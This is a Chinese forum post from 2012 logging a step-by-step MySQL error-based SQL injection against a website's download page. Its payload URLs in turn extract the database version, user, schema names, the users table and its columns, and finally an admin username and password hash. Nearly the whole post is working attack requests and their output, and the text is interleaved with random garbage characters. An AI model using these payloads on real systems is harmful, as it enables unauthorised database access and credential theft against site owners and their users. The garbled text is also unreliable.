http://www.wooyun.org/bugs/wooyun-2010-016669 d B8 V* q3 t) {4 f4 T4 x) x
" m7 y, P" k0 r4 Y+ b6 K之前想找个测试 没想到这有 可以测试下做个记录而已 7 v1 f! e6 s! H
( P5 M; q b9 v) }1 t O: }, V9 `http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 T9 u( X3 Z* S4 l% {* ]
$ t6 P. S, k) T" \7 n6 v d/ u [0 Y/data0/htdocs/leqi_new/app/myapp.php
8 m5 U4 g/ @0 t3 l' E0 _8 `# S. n& Q* M! A* o3 T; t* f
或者
, A$ |: N- K% L4 _ u
8 R4 ^/ U" W, ]& Q0 _- B/**********version()**********/ 5.1.49-log
; n( ? t8 f) A* }& p; Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) b L6 {. ?* M) x- ?% j
+ `, B6 C6 v# h9 @; }/**********user()**********/
1 E4 N5 m) w% g/ t) J! Y4 L' M' Y( vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 |" A% c& h+ [1 U! M
2 u+ j' B* H+ v4 F) t V+ y
/**********database()**********/ leqi: a6 j% {% j) ?9 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 E. W6 y8 P; v6 ^7 }1 w
% G7 q, R7 E# t& C5 m
/**********limit依次递归爆库**********/
2 t' q1 o6 H2 k A# I Khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 U$ ?2 w" [, c' G% winformation_schema
7 X O( q" m( W' Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# e9 d+ [0 o2 B8 M; E. C6 s. X( u
leqi
3 W7 s: I/ L& z+ l- ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 G, c E* [# n9 k2 Gtest
7 _/ T9 V% G7 D3 k8 _3 L1 K) P- P6 D
3 C" j6 I3 i9 c. }0 ~6 O/**********limit依次递归爆表名**********/' p8 L9 g; f+ x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: J! e' j3 K, y$ f5 J. J2 busers
; O9 G% c% p' f# w6 ~+ W- O
% j* e/ s) U# P' U: F7 N/**********limit依次递归爆字段名**********/
R4 c: I0 g2 N( s4 k! b! u, U; hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) R! V7 h- B- ^; E1 H: m7 T
user_id,username,nickname,passwd,group_id
# I3 Q$ ^0 F0 A6 Z, \3 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23- K. I5 y3 e/ i- N0 n. E+ j* U/ I
/wapc/5000_0005_0038 x& w. m" j8 N3 k
11 218 y* ~0 k, Y6 q# q0 [- `$ M, n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 V- p- B) g% f! I6 r/wapc/5000_0005_003
6 v& _0 F- y6 b* V- z2 u5 t3 b11 341 351 361
# m% P0 U. H8 L2 |/ D$ p( _) ~/ h/**********爆数据**********/: u! s+ g0 {' `* m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& ^( E: L8 [$ _. O$ e1 w% tadmin3 N$ t' ~! r7 I- |! Q6 y6 \4 |9 I
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 m( n, R' }, h% a$ x% S" [
6a8b4574ca231eb8bd52764d4978ffcd* d6 r' K; }) @5 [" E, o
/ g( @6 K& W1 m
% }0 Y8 ~! ^; s) I# K* _. g |
发表于 2012-9-13 17:52:09
收藏
支持
反对